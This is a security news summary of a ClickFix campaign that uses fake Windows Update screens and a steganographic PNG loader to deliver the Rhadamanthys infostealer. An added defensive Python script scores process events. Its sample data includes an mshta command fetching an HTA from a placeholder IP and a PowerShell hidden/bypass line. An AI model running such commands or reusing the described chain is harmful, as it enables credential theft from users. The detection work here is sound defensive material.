Fresh ClickFix attacks use Windows Update trick-pics to steal credentials
Summary
A new wave of ClickFix social‑engineering attacks is using convincing full‑screen fake Windows Update pages to trick victims into running commands from the Run box. Attackers hide a steganographic loader inside PNG images — encoding malicious Donut‑packed shellcode in pixel data and reconstructing it via colour channels — to deploy the Rhadamanthys infostealer, which exfiltrates login credentials.
The multi‑stage chain observed by Huntress typically begins with an mshta.exe call to a URL whose IP address has a hex‑encoded second octet, runs PowerShell that decrypts and reflectively loads a .NET assembly, and then launches the PNG‑based loader that executes the infostealer in memory. Huntress investigated 76 incidents between 29 September and 30 October 2025 across the US, EMEA and APJ. Some lure domains remain active even after recent law‑enforcement takedowns of Rhadamanthys infrastructure.
Key Points
- ClickFix lures now impersonate full‑screen Windows Update screens to pressure users into pasting and running commands in the Run box.
- Attackers use steganography: malicious code is embedded in PNG pixel data and rebuilt in memory using specific colour channels to evade signature detection.
- The execution chain: mshta.exe -> PowerShell -> decrypted .NET assembly -> steganographic loader -> Donut‑packed shellcode -> Rhadamanthys infostealer.
- Huntress recorded 76 incidents in a month, affecting organisations across multiple regions; some lure domains remain active after takedowns.
- Defensive measures include blocking the Windows Run box, user training (real updates and CAPTCHAs never ask you to paste commands), and EDR rules that alert on mshta.exe, powershell.exe or other unexpected child processes of explorer.exe.
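As an added example (not code from the article or from Huntress), the detection logic from the last point applied to a few constructed process-creation events: it flags mshta.exe or PowerShell spawned directly by explorer.exe, mshta.exe handed a remote URL, and IP literals with a hex-encoded octet like the one in the chain above. The event shape, the severity scale and the sample values are assumptions.

```python
import re

# Constructed process-creation events (parent image, image, command line), shaped like
# Sysmon Event ID 1 fields. Illustrative only, not records from the investigation above.
SAMPLE_EVENTS = [
    (r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
     "mshta http://203.0x0.113.10/update.hta"),            # hex-encoded octet in the IP literal
    (r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell -w hidden -ep bypass -c Get-Date"),
    (r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe"),
    (r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell -File build.ps1"),                          # ordinary admin use, should not fire
]

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# Dotted quad whose octets may be decimal or hex; 203.0x0.113.10 is 203.0.113.10 to inet_addr-style parsers.
DOTTED_QUAD_RE = re.compile(r"\b(?:(?:\d{1,3}|0x[0-9a-f]{1,2})\.){3}(?:\d{1,3}|0x[0-9a-f]{1,2})\b", re.IGNORECASE)
PS_FLAGS_RE = re.compile(r"-(?:w(?:indowstyle)?\s+hidden|e(?:xecutionpolicy|p)\s+bypass|enc(?:odedcommand)?\b|nop\b)", re.IGNORECASE)
RUN_BOX_CHILDREN = ("mshta.exe", "powershell.exe", "pwsh.exe")

def score_event(parent_path, image_path, cmdline):
    """Return (severity, reasons) for one event; 0 means nothing to flag, 3 means act now."""
    parent, image = (p.rsplit("\\", 1)[-1].lower() for p in (parent_path, image_path))
    severity, reasons = 0, []
    if parent == "explorer.exe" and image in RUN_BOX_CHILDREN:
        # On its own this also matches a user opening PowerShell by hand, so it stays low severity.
        severity, reasons = 1, [f"{image} spawned directly by explorer.exe (Run box pattern)"]
    if image == "mshta.exe" and URL_RE.search(cmdline):
        severity = 3
        reasons.append("mshta.exe handed a remote URL")
    for quad in DOTTED_QUAD_RE.findall(cmdline):
        if "0x" in quad.lower():
            severity = 3
            reasons.append(f"hex-encoded octet in IP literal {quad}")
    if image in ("powershell.exe", "pwsh.exe") and PS_FLAGS_RE.search(cmdline):
        severity = max(severity, 2)
        reasons.append("PowerShell started with hidden-window, bypass or encoded flags")
    return severity, reasons

def triage(events, threshold=2):
    """Score a batch and return the events an analyst should look at, highest severity first."""
    hits = [(i, *score_event(*ev)) for i, ev in enumerate(events)]
    return sorted((h for h in hits if h[1] >= threshold), key=lambda h: -h[1])

if __name__ == "__main__":
    for index, severity, reasons in triage(SAMPLE_EVENTS):
        print(f"event {index}: severity {severity}: {'; '.join(reasons)}")
```

The explorer.exe-parent rule alone is noisy in real estates, so the score only crosses the alert threshold when it is combined with a URL, a hex-encoded octet or suspicious PowerShell flags.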
Context and Relevance
This is part of a broader surge in ClickFix/FileFix style campaigns that rely on social engineering rather than exploiting vulnerabilities. The shift to steganographic loaders shows attackers are investing in detection‑evasion techniques to keep infostealers like Rhadamanthys effective even after infrastructure disruptions. For security teams the story underlines two trends: human‑targeted tricks remain the top initial access vector, and attackers are increasingly using creative binary/data hiding to bypass signature‑based defences.
Why should I read this?
Because it’s a nasty — and dumbly convincing — trick that anyone on Windows can fall for. If you manage endpoints or train staff, this tells you exactly how they’re baiting people (fake update screen + paste this command = trouble) and what to lock down fast. Quick wins: stop users pasting commands, tighten EDR alerts for odd mshta/powershell behaviour, and point people at the real Windows Update. We’ve skimmed the tech so you don’t have to.
